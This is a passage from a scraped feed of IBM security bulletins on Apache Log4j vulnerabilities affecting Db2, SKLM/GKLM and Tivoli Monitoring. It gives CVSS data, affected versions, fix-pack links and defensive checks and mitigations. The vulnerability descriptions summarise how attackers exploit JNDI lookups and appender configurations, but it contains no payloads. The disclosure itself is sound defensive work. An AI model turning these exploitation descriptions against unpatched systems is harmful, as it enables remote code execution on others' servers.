zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140510_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A526111219902489984&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13806_140508_DSClients-nt32-client-11.5.6000.1809-FP000%3A411600865803667264&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13806_140507_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A273075359147908384&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| [IT39584](<https://www.ibm.com/support/pages/apar/IT39584> \"IT39584\" )| \n\n<https://www.ibm.com/support/pages/node/6830623> \n \n## Workarounds and Mitigations\n\nOn a Unix-type system, if you are not using Federation wrappers, you can remove log4j jar files. 
\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin: \u00a0Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-4104\\)\" )\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: \u00a0Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-45046, CVE-2021-45105\\)\" )\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6526462> \"Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \\(CVE-2021-44228\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n11 Nov 2022: Updated 11.5 links to 11.5.8 \n06 June 2022: Updated with links to related Log4j bulletins \n08 Mar 2022: Updated to the correct link for Linux 64-bit, POWER little endian \n24 Feb 2022: Added workaround note regarding removing log4j files when on a Unix-type system and Federation wrappers are not being used. 
\n02 Feb 2022: Clarified versions impacted \n28 Jan 2022: Added a clarification for releases not impacted. \n24 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and Windows\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"11.5.x\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-11T17:14:24", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-11-11T17:14:24", "id": "6DF2E72D03F9AA8435A0A58D154D82EDF5203309F8C81C42E35CBC71D2A79BDD", "href": "https://www.ibm.com/support/pages/node/6549888", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:39:36", "description": "## Summary\n\nMultiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832). The fix addresses the vulnerability by removing Apache Log4j.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n**DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n \n**CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n**DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n**CVEID: **[CVE-2021-44832](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>) \n**DESCRIPTION: **Apache Log4j could allow a remote attacker with permission to modify the logging configuration file to execute arbitrary code on the system. By constructing a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI , an attacker could exploit this vulnerability to execute remote code. 
\nCVSS Base score: 6.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/216189](<https://exchange.xforce.ibmcloud.com/vulnerabilities/216189>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version(s)** \n \n---|--- \nIBM Security Key Lifecycle Manager (SKLM) v2.7** [EOS] | WebSphere Application Server v9.0.0.1 \nIBM Security Key Lifecycle Manager (SKLM) v3.0 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v3.0.1 | WebSphere Application Server v9.0.0.5 \nIBM Security Key Lifecycle Manager (SKLM) v4.0 | WebSphere Application Server v9.0.5.0 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1 | WebSphere Application Server v9.0.5.5 \nIBM Security Guardium Key Lifecycle Manager (GKLM) v4.1.1 | WebSphere Application Server Liberty 21.0.0.6 \n \n****** IBM Security Key Lifecycle Manager (SKLM) v2.7 - Applicable only for customers with support extension.\n\n## Remediation/Fixes\n\nDepending on your SKLM/GKLM version, see the relevant instructions:\n\n * SKLM 3.0, 3.0.1, and 4.0\n * GKLM 4.1\n * GKLM 4.1.1\n\n* * *\n\n## For SKLM 3.0, 3.0.1, 4.0\n\n\\- _Also applicable for SKLM 2.7 (**only for customers with a support extension contract**)._\n\n**Required step: Apply WAS fix pack** \nApply WebSphere Application Server (WAS) 9.0.5.11. For instructions, see [How to install WebSphere Application Server fix pack](<https://www.ibm.com/support/pages/node/6538024>).\n\n**Recommended additional step: Upgrade Java**\n\nAfter you apply the WAS fix pack, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). 
For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1\n\n**Required step: Apply WAS fix pack and GKLM fix pack**\n\n 1. Apply WebSphere Application Server (WAS) 9.0.5.11. For instructions, see [How to install WebSphere Application Server fix pack](<https://www.ibm.com/support/pages/node/6538024>).\n 2. Apply [GKLM 4.1.0 FP4](<https://www.ibm.com/support/pages/node/6552274>). You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral> \"Fix Central\" ). \n\n**Recommended additional step: Upgrade Java**\n\nAfter you apply the WAS fix pack, it is recommended that you upgrade the IBM\u00ae SDK Java\u2122 Technology Edition maintenance to [V8.0.6.26](<https://www.ibm.com/support/pages/node/587245#80626>). For instructions, see [How to upgrade IBM SDK Java Technology Edition](<https://www.ibm.com/support/pages/node/6538362>).\n\n**Note:** You only need to apply Java SDK. No other manual step is required. \n\n* * *\n\n## For GKLM 4.1.1\n\nThe issues are fixed in [GKLM 4.1.1 - Fix Pack 3](<https://www.ibm.com/support/pages/node/6529054> \"GKLM 4.1.1 - Fix Pack 3\" ). 
You can download it from [Fix Central](<https://www.ibm.com/support/fixcentral>).\n\n** **\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSWPVP\",\"label\":\"IBM Security Key Lifecycle Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"2.7**, 3.0, 3.0.1, 4.0, 4.1.0, 4.1.1\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-04T12:55:51", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j affect the IBM WebSphere Application Server and IBM Security Guardium Key Lifecycle Manager (CVE-2021-4104, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-05-04T12:55:51", "id": "8B1D9C3BB3CE6364BD0FE7732D06F394D6218ADAB37D1876856BEEE8923DFA4A", "href": "https://www.ibm.com/support/pages/node/6539408", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-30T21:29:03", "description": "## Summary\n\nThe following security issue has been identified in components related to IBM Tivoli Monitoring (ITM) portal server and client. 
\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 \n \n## Remediation/Fixes\n\nIn addition to the CVE in this bulletin the following are also addressed by the WebSphere patch below:\n\n[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44832>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)\n\n \nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0010| 6.3.0.7 Fix Pack 7 Service Pack 10| <https://www.ibm.com/support/pages/node/6550868> \n6.X.X-TIV-ITM_TEPS_WAS-IHS_ALL_8.55.20.02| 6.3.0.7 Fix Pack 7 Service Pack 5 or later| <https://www.ibm.com/support/pages/node/6538128> \n \n## Workarounds and Mitigations\n\nNone of the vulnerable instances of log4j are actually used by ITM. If enabled, the IBM Tivoli Monitoring dashboard data provider may be using log4j client libraries which are not the actual log4j core function. 
Note all versions of log4j components are only installed if you've installed one of the following components:\n\ncj Tivoli Enterprise Portal Desktop Client \ncw Tivoli Enterprise Portal Browser Client \ncq Tivoli Enterprise Portal Server \n\nThe provided remediation will safely remove or update all vulnerable instances of log4j.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n31 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTFXA\",\"label\":\"Tivoli Monitoring\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"6.3.0.7\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-30T17:31:59", "type": "ibm", "title": "Security Bulletin: Vulnerablity in Apache Log4j may affect IBM Tivoli Monitoring (CVE-2021-4104)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-12-30T17:31:59", "id": "08803B708D4CA95FF8DD68A4DE7FBE7DEAA67387194E25D8CD693B135E7332D9", "href": "https://www.ibm.com/support/pages/node/6551452", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-11T17:27:41", "description": "## Summary\n\nApache Log4j open source library used by IBM\u00ae Db2\u00ae is affected by a vulnerability that could allow a remote attacker to execute arbitrary code on the system. This library is used by the Db2 Federation feature. The fix for the vulnerability is to update the log4j library. Please see CVE-2021-4104 for bulletin relating to Log4j V1. Please see CVE-2021-44832, CVE-2021-45046 and CVE-2021-45105 for bulletins relating to Log4j V2. Updating log4j to a version 2.15.0 or higher also addresses CVE-2021-4104.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFix pack levels of IBM Db2 V11.5 for all editions on all platforms are affected only if the following features are configured: \n\n\nFederation: \n\n\n * DVM JDBC wrapper driver,\n * NoSQL wrapper driver (for Hadoop),\n * Blockchain wrapper driver (for Hyperledger Fabric, Linux 64-bit, x86-64 only)\n\nIBM Db2 V9.7, V10.1, V10.5 and V11.1 are not affected.\n\nTo determine if Federation is enabled, issue the following:\n\ndb2 get dbm cfg | grep FEDERATED\n\nIf a value of NO is returned, you are not vulnerable.\n\nYou can determine if you are using one of the affected wrappers by performing:\n\nTo determine if the DVM JDBC wrapper is in use, issue the following statement:\n\ndb2 \"select servername from syscat.serveroptions where option = 'DRIVER_CLASS' and setting = 'com.rs.jdbc.dv.DvDriver'\"\n\nIf a servername is returned, then you are using the DVM JDBC wrapper via the DvDriver class.\n\n \nTo determine if the NoSQL hadoop wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.servers where servertype = 'HDFSPARQUET'\" \n\nIf 1 or more rows are returned, then NoSQL hadoop wrapper is in use.\n\nTo determine if the NoSQL Blockchain wrapper is in use, issue the following statement:\n\ndb2 \"select * from syscat.serveroptions where option='PEER_URL'\"\n\nIf 1 or more rows are returned, then NoSQL Blockchain wrapper is in use.\n\n## Remediation/Fixes\n\nCustomers running any vulnerable fixpack level of an affected Program, V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for the V11.5.6 and V11.5.7 release. 
They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.\n\n**Release**| **Fixed in fix pack**| **APAR**| **Download URL** \n---|---|---|--- \nV11.5| TBD| \n\nIT39389\n\n| Special Build for V11.5.6: \n\n[AIX 64-bit](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134764_DB2-aix64-universal_fixpack-11.5.6.0-FP000%3A759307440669784704&includeSupersedes=0> \"AIX 64-bit\" ) \n[Linux 32-bit, x86-32](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134766_DSClients-linuxia32-client-11.5.6.0-FP000%3A655540181122919168&includeSupersedes=0> \"Linux 32-bit, x86-32\" ) \n[Linux 64-bit, x86-64](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134765_DB2-linuxx64-universal_fixpack-11.5.6.0-FP000%3A321475938953624576&includeSupersedes=0> \"Linux 64-bit, x86-64\" ) \n[Linux 64-bit, POWER\u2122 little endian](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134763_DB2-linuxppc64le-universal_fixpack-11.5.6.0-FP000%3A676852752763543680&includeSupersedes=0> \"Linux 64-bit, POWER\u2122 little endian\" ) \n[Linux 64-bit, System z\u00ae, System z9\u00ae or 
zSeries\u00ae](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134767_DB2-linux390x64-universal_fixpack-11.5.6.0-FP000%3A646964920519258496&includeSupersedes=0> \"Linux 64-bit, System z\u00ae, System z9\u00ae or zSeries\u00ae\" ) \n[Windows 32-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/IBM+Data+Server+Client+Packages&release=All&platform=All&function=fixId&fixids=special_13320_134762_DSClients-nt32-client-11.5.6000.1809-FP000%3A980553972695302272&includeSupersedes=0> \"Windows 32-bit, x86\" ) \n[Windows 64-bit, x86](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information%2BManagement&product=ibm/Information+Management/DB2&release=All&platform=All&function=fixId&fixids=special_13320_134761_DB2-ntx64-universal_fixpack-11.5.6000.1809-FP000%3A220578880243028736&includeSupersedes=0> \"Windows 64-bit, x86\" ) \n \nV11.5| 11.5.8| IT39389| <https://www.ibm.com/support/pages/node/6830623> \n \n## Workarounds and Mitigations\n\nA user with SYSADM authority should perform the following:\n\ndb2stop\n\ndb2set DB2_JVM_STARTARGS=\"-Dlog4j2.formatMsgNoLookups=true\"\n\ndb2start\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response 
Blog](<http://www.ibm.com/blogs/psirt>)\n\nSee [Security Bulletin: Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-4104)](<https://www.ibm.com/support/pages/node/6528678> \"Security Bulletin: \u00a0Vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-4104\\)\" )\n\nSee [Security Bulletin: A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-44832)](<https://www.ibm.com/support/pages/node/6549888> \"Security Bulletin: \u00a0A vulnerability in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0\\(CVE-2021-44832\\)\" )\n\nSee [Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae (CVE-2021-45046, CVE-2021-45105)](<https://www.ibm.com/support/pages/node/6528672> \"Security Bulletin: \u00a0Multiple vulnerabilities in Apache Log4j affects some features of IBM\u00ae Db2\u00ae \u00a0 \\(CVE-2021-45046, CVE-2021-45105\\)\" )\n\n## Acknowledgement\n\n## Change History\n\n11 Nov 2022: Updated 11.5 links to 11.5.8 \n06 June 2022: Updated related links for other Log4j bulletins. \n21 Dec 2021: Links for 11.5.7 Windows 32-bit and Windows 64-bit have been added \n20 Dec 2021: Links for 11.5.6 Windows 32-bit and Windows 64-bit have been added \n16 Dec 2021: Updated to reflect that all Db2 editions are impacted. Added instructions to determine if Federation is enabled. 
\n16 Dec 2021: Added fix pack links for 11.5.7 special builds on AIX 64-bit, Linux 64-bit, Linux 64-bit POWER\u2122 little endian \n15 Dec 2021: Added fix pack links for 11.5.6 special builds on AIX 64-bit, Linux 32-bit, Linux 64-bit, Linux 64-bit POWER\u2122 little endian, Linux 64-bit System z\u00ae, System z9\u00ae or zSeries\u00ae \nAdded fix pack links for 11.5.7 special builds on Linux 32-bit, Linux 64-bit System z\u00ae, System z9\u00ae or zSeries\u00ae \n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Product\":{\"code\":\"SSEPGG\",\"label\":\"DB2 for Linux- UNIX and 